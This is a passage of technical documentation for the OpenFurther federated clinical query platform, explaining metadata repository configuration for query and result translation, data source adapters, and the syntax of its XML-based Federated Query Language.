artifacts\n** Logical models (UML), local models (UML), model mappings\n** Administrative information\n** Descriptive information\n* Models supported\n** OMOP, i2b2, local models\n\nMetadata Repository (MDR)\n-------------------------\n\nGetting Started\n~~~~~~~~~~~~~~~\nTwo important functions supported by the metadata repository are Query Translation and Result Translation. Data stored within the MDR is used to drive each of these processes.\n\n.Translating Metadata\nimage::images\/figures\/translating_metadata.png[]\n\nQuery Translation\n^^^^^^^^^^^^^^^^^\nThe objective of a query translation is to convert the OpenFurther Query Language (FQL) query (OpenFurther's classes, attributes, and attribute values) into the target physical data source's data classes, attributes, and attribute values while maintaining the integrity of the query logic. If the attributes being queried does not exist in the external target data source, no data will be returned from the particular source. Therefore, the end user must carefully select the attributes to ensure that they exist in the target of interest.\n\n.Query Translation\nimage::images\/figures\/query_translation.png[]\n\nThe user interface, currently i2b2, is responsible for building a query. When a query is submitted to the FQE, the FQE converts i2b2's query into the FQL, an XML representation of the query (see the FQL XML Schema) that consists of logical expressions using OpenFurther's data model classes and attributes. Class and class attribute names used in FQL are based on OpenFurther classes and attributes and can be found in the OpenFurther's Java code located here: https:\/\/github.com\/openfurther\/further-open-core\/tree\/master\/ds\/ds-further\/src\/main\/java\/edu\/utah\/further\/ds\/further\/model\/impl\/domain\n\nCoded class attribute value domains within the OpenFurther model are all based on standard terminology where demographics are SNOMED CT codes, diagnosis are ICD-9 codes, and labs are LOINC codes. All attributes that have coded values sets also have an associated attribute that ends with the term 'NamespaceId' (namespaces are also called coding systems). This NamespaceId attribute is used to signify what coding system a particular attribute will use. For instance, raceCode=413773004 and raceCodeNamespaceId=30 would signify the SNOMED CT code for the Caucasian race.\n\nBy default, Apelon DTS reserves certain identifiers for use with standard terminologys.\n\n.Apelon DTS Namespace Identifiers\n[width=\"40%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Namespace |Identifier\n|SNOMED CT |30\n|ICD-9 |10\n|LOINC |5102\n|RxNorm |1552\n|======================\n\nExample input and output\n++++++++++++++++++++++++\n\n.Example query translation input\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceNamespaceId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:long\">30<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">race<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\t413773004\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nGiven the above input, query translation would generate the following output\n\n.Example query translation output\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceConceptId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:decimal\">\n\t\t\t\t\t4185154\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nResult Translation\n^^^^^^^^^^^^^^^^^^\nEach data source queried by OpenFurther will respond with a result set in the platform\/database specific format and need to be converted into OpenFurther's data model for final analysis and reconciliation of the returned data from each data source, ie. all the pears, oranges, and pineapples need to be converted the same kind of apples. This is the job of the query result set translations, to translate all the query results back to a common\/canonical\/platform-independent model, or the OpenFurther model in this case.\nOpenFurther uses XQuery code to translate platform-specific result sets to the OpenFurther model implying all data is\/must be converted to XML. Converting to XML is not an extra cost since OpenFurther is a web service-centric infrastructure where messages between services are communicated via XML. Query results are no exception. Data within the MDR drives the XQuery code to translate the data source specific data model and values to the OpenFurther data model and values based on standard terminology. After the XML has been translated the data are unmarshaled back to Java objects, the OpenFurther model Java objects, where\/when they are persisted to the query results database (typically the in-memory database) using Hibernate.\n\n.Result Translation\nimage::images\/figures\/result_translation.png[]\n\nCreating metadata in the MDR\n++++++++++++++++++++++++++++\nTranslations depend on the MDR for attribute-to-attribute translations. The MDR is supported by an abstract data model where metadata \"things\" are Assets (see the FMDR.ASSET table), including data classes and class attributes. There are other Asset supporting tables ASSET_VERSION and ASSET_RESOURCE that you can ignore for now, as they are not currently used for this purpose. There are, however, two other tables that are critical, ASSET_ASSOC (association) and ASSET_ASSOC_PROP (association properties). ASSET, ASSET_ASSOC, and ASSET_ASSOC_PROP work together to describe attribute-to-attribute translation mappings. Assets also represent association types, such as hasAttribute, or translatesTo. The MDR contains metadata used for both Query Translations and Result Translations.\n[NOTE]\nThe MDR is configured using Java class and Java field names, rather than database table and attribute names.\n\nThere are 3 phases to configure a new data source for the MDR.\n\n.Phase 1\nThe first thing that should happen is to create a Mapping of the FURTHER model to your local data model. This step is generally performed by a Terminologist and\/or Data Architect and has no specific configuration with the MDR, but serves as the business requirements or data dictionary document for configuring the MDR in Phases 2 and 3.\n\nYou can use this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Mappings_Demo.xls\n\n.Phase 2\nConfigure your local data source for the MDR.\n\nYou should have review and have a fair understanding of the following MDR data model before proceeding.\n\n.MDR ERD Diagram\nimage::images\/figures\/fmdr.png[MDR ERD Diagram]\n\n\/\/ Here is just One way of having a blank line with asciiDoc\n{empty} +\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Asset_Demo.xls\n\nThe Excel File's Instructions Tab contains these following high level steps:\n\n1. Create a namespace - a namespace is itself an Asset of Asset type namespace (see other namespace Assets for examples. \nRetrieve the newly created Asset ID for MyNamespace and use this Asset ID to create your classes and attributes in Steps 2 & 3.\n2. Create a class in MyNamespace - this is done by creating another Asset that is of type Physical Class.\nRetrieve the newly created Asset ID for MyClass and use this Asset ID to create your Class-To-Attributes Associations in Step 4.\n3. Create the class attributes in MyNamespace - this is done by creating Assets that are of type Class Attribute.\n4. Associate all of the class attributes with your class by creating an Asset Association (ASSET_ASSOC) to create the associations myPhysicalClass hasAttribute myClassAttribute for each of the attributes created in Step 3.\n\n.Phase 3\nConfigure FURTHER to External Data Source Associations and Properties\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Assoc_Demo.xls\n\nThe Excel File's Instructions Tab contains these following high level steps:\n\n1. Configure FURTHER Attribute (Java Field) to External Attribute (Java Field) Associations.\nFor example, OpenFurther.Person.dateOfBirth to MyNamespace.myPatient.birthDate. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person.dateOfBirth (left side) maps to myPerson.birthDate (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n2. Configure FURTHER Table (Java Class) to External Table (Java Class) Associations.\nFor example, OpenFurther.Person to MyNamespace.myPatient. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person (left side) maps to MyNamespace.myPatient (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n3. Create translatesTo association translation properties for the above 2 steps.\nTranslation associations (and other associations) can have properties (in ASSET_ASSOC_PROP table) that describe the translation mapping requirements. For example, some properties may direct a data type conversion such as int to string, while others may declare a function that needs to be used for a functional conversion, or even an instruction to not change an attribute name. Properties are created via the ASSET_ASSOC_PROP table and are associated to ASSET_ASSOC records.\n\n[NOTE]\nThere are two parts to the list of Potential Association Properties. \nPart One is primarily used for Query Translations, and part Two is used for Result Translations. \nQuery Translations are much more complex and therefore supports more association properties than Result Translations.\n\n[NOTE]\nGeneral Error Handling Note:\nIf you query an Attribute (Data Element) that exists in the Central Data Model, but is missing and does not have an associated Attribute in the External Data Model, the XQuery Query Translation program is expected to Error out with the missing data element specified.\nThe reasoning is because when a data element is missing from a criteria, the definition of the entire query is changed, and therefore invalidates the entire Query.\nThis Error will halt the entire Query Processing Session.\nHowever, for Result Translation, Missing data elements are not critical since the rest of the data values are still valid and may be valuable to the researchers.\nTherefore, a missing data element association in Result Translations will not halt the entire Result Translation process.\n\n.Part One (Query Translations)\nThere are Normal Scenarios and Special Scenarios for Query Translations.\n\n.Normal Scenario 1) Configure for DTS Coded Value Translation with:\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = translateCode\n\n.Normal Scenario 2) Configure for Data Type Translation with:\nProp_Name = ATTR_VALUE_TRANS_TO_DATA_TYPE\n\nProp_Val = xs:decimal (Or other appropriate valid XML Data Types)\n\n.Java Data Type to XML Data Type Mapping. There may be others not listed here.\n[options=\"header\"]\n|=======================\n|Java Data Type | XML Data Type\n|char or java.lang.Character | xs:string\n|byte or java.lang.Byte | xs:byte\n|short or java.lang.Short | xs:short\n|int or java.lang.Integer | xs:int\n|long or java.lang.Long | xs:long\n|float or java.lang.Float | xs:float\n|double or java.lang.Double | xs:double\n|boolean or java.lang.Boolean | xs:boolean\n|java.lang.String | xs:string\n|java.math.BigInteger | xs:integer\n|java.math.BigDecimal | xs:decimal\n|java.util.Calendar | xs:dateTime\n|java.util.Date | xs:dateTime\n|javax.xml.namespace.QName | xs:QName\n|java.net.URI | xs:string or xs:anyURI\n|javax.xml.datatype.XMLGregorianCalendar | xs:anySimpleType\n|javax.xml.datatype.Duration | xs:duration\n|java.lang.Object | xs:anyType\n|java.awt.Image | xs:base64Binary\n|javax.activation.DataHandler | xs:base64Binary\n|javax.xml.transform.Source | xs:base64Binary\n|java.util.UUID | xs:string\n|=======================\n\n.Normal Scenario 3) Configure property for the Composite ID Association.\nThis is currently needed to support queries within previous Query Result Sets.\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = Java Data Type of the external person ID that is associated with the OpenFurther.Person.compositeId\n\nFor example,\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = java.lang.Integer\n\n.Normal Scenario 4) Configure 2 properties, Alias_Key and Alias_Value for each Table Association.\nIf there are more than one table associations, configure multiple pairs of these properties.\n\nThe Prop_Val for ALIAS_KEY can be anything. \n\nFor example,\n\nProp_Name = ALIAS_KEY\n\nProp_Val = dx\n\nIf your data source requires a Static Alias Key Prop_Val, append 'STATIC^' to your Alias Key Prop_Val.\n\nUse this example:\n\nProp_Name = ALIAS_KEY\n\nProp_Val = STATIC^Diagnosis\n\nNow, configure the ALIAS_VALUE Property\n\nThe Prop_Val for ALIAS_VALUE is the Java member name within the rootObject (Person Class).\n\nFor example,\n\nProp_Name = ALIAS_VALUE\n\nProp_Val = conditionEras\n\n.Special Scenario 1) Occasionally, there may be some value translations that are non-coded values. For example, if you associate age to birthYear, you will need to special custom XQuery function to perform the translation. In this case, create a function in the XQuery program called ageToBirthYear and configure the MDR with this property.\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = ageToBirthYear\n\nSo instead of the normal translateCode in the Prop_Val, we have \"ageToBirthYear\".\n\n.Special Scenario 2) Each Asset Association by default specifies that Left Asset translates to Right Asset. However, if you want to skip this translation without throwing an Error, provide an assocation property with the following. This is mostly used with devNull associations. For example, the FURTHER.PERSON.ID.DATASETID does not translate to anything at the External Data Sources, however, we do not want to consider this as an Error, therefore, we simply skip it from translation processing. This property is used for only Special attributes such as datasetID, and Qualifier \"Type\" attributes. This skipping property should NOT be applied to normal attributes, where an Error is expected.\n\nProp_Name = ATTR_TRANS_FUNC\n\nProp_Val = skipAttr\n\n.Special Scenario 3) The FURTHER table attribute Obervation.observation is overloaded as Diagnosis, Procedure, and Lab Order. If the FURTHER.Obervation table translates to more then one table at the External Data Source, we must provide this property to assist with Query Translation. This property specifies the type of observation (Diagnosis Procedure, or Lab) in the FURTHER model so we know what kind of data the row is representing. The Prop_Val is the SNOMED code representing the observation type. If the FURTHER.Obervation table translates to ONLY one table at the external data source, we do not need to configure this, but do ensure that the ALIAS_KEY and ALIAS_VALUE properties are configured properly as stated above in Normal Scenario 3. Always start the Prop_Name with \u201cOBSERVATION_TYPE\u201d.\n\nNote: OBSERVATION_TYPE_DX means Diagnosis.\n\nProp_Name = OBSERVATION_TYPE_DX\n\nProp_Val = 439401001\n\nOr\n\nProp_Name = OBSERVATION_TYPE_LAB\n\nProp_Val = 364712009\n\nOr\n\nProp_Name = OBSERVATION_TYPE_PROCEDURE\n\nProp_Val = 71388002\n\n\n.Special Scenario 3 Addendum) To distinguish between coding standards with the Same Observation Type.\nWhen you have multiple attributes that translated to multiple coding standards in the external data source, you will need to configure the Prop_Name with a unique name and appended DTS Namespace ID to the Prop_Val. Replace the ^DTS_Namespace_ID with whatever you are actually using in your DTS environment.\n\nFor Diagnosis, using ICD9\n\nProp_Name = OBSERVATION_TYPE_DX_ICD9\n\nProp_Val = 439401001^10\n\nFor Diagnosis, using ICD10\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10\n\nProp_Val = 439401001^1518\n\nif you would like to force a specific observationType and namespace combination to Error Out,\nyou append '^E' at the end of the Prop_Name like this:\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10^E\n\nProp_Val = 439401001^1518\n\n\n.Special Scenario 4) Sometimes one FURTHER <criteria> node translates to two <criteria> nodes at the External Data Source. For example, FURTHER.Person.race translates to OpenMRS.PersonAttribute.value, where the PersonAttributeType = 1. Therefore, we need one <criteria> for the OpenMRS.PersonAttribute.value and another <criteria> node for OpenMRS.PersonAttribute.PersonAttributeType. What we will do is create an XML Template in the MDR where we will replace a specific <criteria> with the translated criteria. Refer to the example below. \n\nTo configure a XML Template, use this Property:\n\nProp_Name = MORE_CRITERIA\n\nProp_Val = {XML Template} (In One Continuous String is better for output format)\n\nWhere Prop_Val =\n\/\/ Not sure why i cannot use \n\/\/ [source,xml] to display source code here...\n\n<criteria xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" \n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t<searchType>IN<\/searchType>\n\t<parameters>\n\t\t<parameter xsi:type=\"xs:string\">personId<\/parameter>\n\t<\/parameters>\n\t<query rootObject=\"Person\" xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n\t\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t\t<rootCriterion>\n\t\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t\t<criteria moreCriteria=\"ReplaceMe\"><\/criteria>\n\t\t\t<criteria>\n\t\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t\t<parameters>\n\t\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:string\">pa.personAttributeType<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:long\">1<\/parameter>\n\t\t\t\t<\/parameters>\n\t\t\t<\/criteria>\n\t\t<\/rootCriterion>\n\t\t<aliases>\n\t\t\t<alias associationObject=\"PersonAttribute\">\n\t\t\t\t<key>pa<\/key>\n\t\t\t\t<value>personAttributes<\/value>\n\t\t\t<\/alias>\n\t\t<\/aliases>\n\t<\/query>\n<\/criteria>\n\n.Special Scenario 5) Sometimes a FURTHER Person Field translates to a non-person table at the external source. Since we do not get <alias> nodes for FURTHER Person Fields, we need to create new alias(es) for these scenarios. For example, FURTHER.Person.vitalStatus translates to OpemMRS.ObservationPeriod.personStatusConceptId field. In this case, use this property configuration:\n\nProp_Name = ATTR_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\nWhere, Prop_Val = \u201cop^observationPeriods\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above. \n\n.Special Scenario 6) Add Extra Alias for Special Cases\nSometimes we have an alias that translates to multiple aliases due to hierarchy relationship levels. This EXCLUDES Observation Types Issues. For example, FURTHER.orders table translates to OpenMRS.patient.orders table. Therefore, we need another alias to support the Sub Level. We need the Translated aliases to be like this, where the ord will go through the patient object:\n\n<aliases>\n <alias associationObject=\"Observations\">\n <key>p<\/key>\n <value>patient<\/value>\n <\/alias>\n <alias associationObject=\"Order\">\n <key>ord<\/key>\n <value>p.orders<\/value>\n <\/alias>\n<\/aliases>\n\nNote that for this situation, we DO NOT want to update any parameter alias values in the XML Query file.\n\nProp_Name = EXTRA_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\ni.e. Prop_Val = \u201cobs^observations\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above.\n\n.Special Scenario 7) To activate Dynamic Custom Function Calls, we can configure a function name, prefixed with 'CUSTOM^fqt:'.\nYou must have a XQuery function with a matching name for this to work. \nNote that the function name must be prefixed with the 'fqt:' XQuery Namespace.\n\nFor example, if you want to apply a Custom XQuery function yearFromDateTime to the value to be translated:\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = CUSTOM^fqt:yearFromDateTime\n\n\n\n\n\n.Part Two (Result Translations)\nThere are Normal Scenarios and Special Scenarios for Result Translations.\n\n.Normal Scenario 1) Specify the RESULT_PATH for each External Asset. You can include the XPath Predicate when necessary. The XPath Value begins under the rootObject of the External data model. For example, if the rootObject is Person, and you are trying to get to the gender, use \u2018\/gender\u2019 as the XPath value. The rootObject \u2018\/Person\u2019 part is not needed.\n\nProp_Name = RESULT_PATH\n\nProp_Val = {XPath Value to the External XML Node}\n\nFor example, Prop_Val =\n\/personAttributes\/personAttribute\/value[..\/personAttributeType=1]\n\n.Normal Scenario 2) Specify the External Root Object\u2019s ID Attribute.\n\nGenerally, this property is set for the {FURTHER.PERSON} to {EXTERNAL.PERSON} association.\n\nNote that we may want to rename this property name to EXT_PERSON_ID_ATTR in the future, since we may want to support multiple root objects in the future.\n\nProp_Name = EXT_ROOT_ID_ATTR\n\nProp_Val = {rootObject ID Attribute}\n\nFor example, Prop_Val = personId\n\nBe sure to have a One-To-One Mapping for the rootObject. If a One-To-Many mapping is really necessary, specify an additional property with:\n\nProp_Name = RESULT_SELECTION\n\nProp_Val = pickMe\n\nOr you can disable the unnessary association by setting the asset_assoc.enabled field to \u2018N\u2019.\n\n.Special Scenario 3) To skip an attribute from Result Translation, Set the RESULT_PATH property value to \u201cS\u201d (Skip).\nA Result Attribute will automatically be skipped if it has no value, or if the result tag does not exist.\n\nProp_Name = RESULT_PATH\n\nProp_Val = S\n\n.Part Three (Query & Result Translations)\nBy default, when calling DTS (Apelon Terminology Server), we get the exact match of the external 'Local Code' value.\nHowever, we can override this default with an association property like this:\n\nIf we want to get the value of DTS property type 'Value_Of_Race'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Value_Of_Race\n\nOR\n\nIf we want to get the value of DTS property type 'Domain'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Domain\n\nThis will create a DTS call like this:\n\nhttp:\/\/dev-esb.further.utah.edu:9000\/dts\/rest\/translate\/30\/Code%20in%20Source\/439401001\/32776\/Domain?view=HUMAN\n\n\n\nData Source Adapters\n--------------------\nData source adapters are the pieces of OpenFurther which interact with a data source. Loosely speaking, data source adapters are like plugins. They are simply modules that listen for incoming query requests and act upon them, following a specified protocol. Any programming language that can send and receive messages to a JMS topic, as well as process XML, can be used to program a data source adapter. We do, however, recommend using the existing framework.\n\nData source adapters follow a standard protocol:\n\n* initialization\n* query translation\n* execution\n* result translation\n\nAt the end of each step, status messages are sent to a JMS topic. Statuses include the current state of the query and how many results have been processed at that time.\n\nLikewise, every query can be in one of the following states:\n\n* QUEUED\n* STARTED\n* EXECUTING\n* STOPPED\n* FAILED\n\nJava Data Source Adapter Framework\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther provides several data source adapters, supported by the community, that run against well known data models. These adapters can be used by downloading the existing adapter, customizing the configuration, compiling them for execution, and installing them into the system.\n\nAdditionally, OpenFurther is flexible and also provides the ability to implement your own custom adapter. Reasons for doing this include but are not limited to:\n\n* A custom data model\n* A custom interface for accessing the data, such as a web service.\n* Custom processing required beyond the standard processing steps within an adapter.\n\nImplementing a custom data source adapter\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nWe recommend downloading the source code of an existing data source adapter to use as a reference and starting point for your custom data source adapter. Existing data source adapters can found here https:\/\/github.com\/openfurther\/further-open-datasources\n\nQuery Processors\n^^^^^^^^^^^^^^^^\nData source adapters follow a chain-of-responsibility pattern. The query is passed through several processors and each processor is given an opportunity to interact or ignore the data given to it by the processing of previous processors. \n\nThere are several default query processors for each step within data source adaption.\n\nEach Query Processor has a Delegate implementation that contains the business logic to implement each processor.\n\n* QueryTranslatorQp\n** Delegate: QueryTranslatorXQueryImpl - implements query translator by utilizing an XQuery program which in turns utilizes metadata within the MDR. Xquery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* QueryExecutorQp\n** Delegate: ExecutorQuestImpl \u2013 implements query execution based on the data source type specified by DS_TYPE within initialization. Currently, only database data sources are well supported, however, web services data sources can be implemented with additional effort.\n* ResultTranslatorQp\n** Delegate: ResultTranslatorXqueryImpl \u2013 implements results translation by applying an xquery file to the marshaled XML results. Xquery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* FinalizerQp\n** Delegate: FinalizerMock \u2013 does nothing but finish the query\n\nFederated Query Engine (FQE)\n----------------------------\n\nFederated Query Language (FQL)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nAll queries sent to OpenFurther are constructed using FQL. FQL is an object oriented query language expressed in XML that is largely based off of the http:\/\/docs.jboss.org\/hibernate\/orm\/3.3\/reference\/en\/html\/querycriteria.html[Hibernate Criteria API]. \n\nRoot Object\n^^^^^^^^^^^\nFQL queries are constructed against a given data model, for instance, the OpenFurther model. Every query is centered around a given object. This is called the root object. For instance, when querying for persons with a particular diagnosis, the root object would be Person.\n\nYou declare the root object as an attribute of the <query> tag\n\n.Declaring a root object\n[source,xml,numbered]\n----\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" \n\trootObject=\"Person\">\n\t....\n<\/query>\n----\n\nQuery Attributes\n^^^^^^^^^^^^^^^^\nFQL query attributes are simply the field names (instance variables) of the root object you're querying against. If you're familiar with SQL, you can think of query attributes like database columns.\n\nFor instance, in the following Person class, you could use 'compositeId', 'administrativeGenderNamespaceId', and 'administrativeGender' are all query attributes that can be used in FQL.\n\n.Java root object fields\n[source,java,numbered]\n----\npublic class Person implements PersistentEntity<PersonId>\n{\n\n\t@Column(name = \"FPERSON_COMPOSITE_ID\")\n\tprivate String compositeId;\n\n\t@Column(name = \"administrative_gender_nmspc_id\")\n\tprivate Long administrativeGenderNamespaceId;\n\n\t@Column(name = \"administrative_gender_cid\")\n\tprivate String administrativeGender;\n\n\t....\n\n}\n----\n\nFQL Reference\n^^^^^^^^^^^^^\n\nSimple Expressions\n++++++++++++++++++\n\n.EQ - Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>EQ<\/parameter>\n <parameter>DiagnosisGrouping.codeSequenceNumber<\/parameter>\n <parameter>766.2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.NE - Not Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>NE<\/parameter>\n <parameter>Lab.value<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GT - Greater Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LT - Less Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LE - Less Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GE - Greater Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nUnary Expressions\n+++++++++++++++++\n\n.NOT - Negation\n[source,xml,numbered]\n----\n<criteria>\n <searchType>NOT<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/critera>\n<\/criteria>\n----\n\nMultinary Expressions\n+++++++++++++++++++++\n\n.Conjunction - a conjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>CONJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\n.Disjunction - a disjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>DISJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\nInterval Expressions\n++++++++++++++++++++\n\n.Between\n[source,xml,numbered]\n----\n<criteria>\n <searchType>BETWEEN<\/searchType>\n <parameters>\n <parameter>Observation.observationValue<\/parameter>\n <parameter>1<\/parameter>\n <parameter>2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nString Expressions\n++++++++++++++++++\n\n.Like - Contains the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>CONTAINS<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Exact match of the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>EXACT<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value starts with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>STARTS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value ends with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>ENDS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\nCollection Expressions\n++++++++++++++++++++++\n\n.In - Value(s) is within set\n[source,xml,numbered]\n----\n<criteria>\n <searchType>IN<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">401.1<\/parameter>\n <parameter xsi:type=\"xs:string\">401.2<\/parameter>\n <parameter xsi:type=\"xs:string\">401.3<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nFQL to Hibernate Criteria\n^^^^^^^^^^^^^^^^^^^^^^^^^\nSince 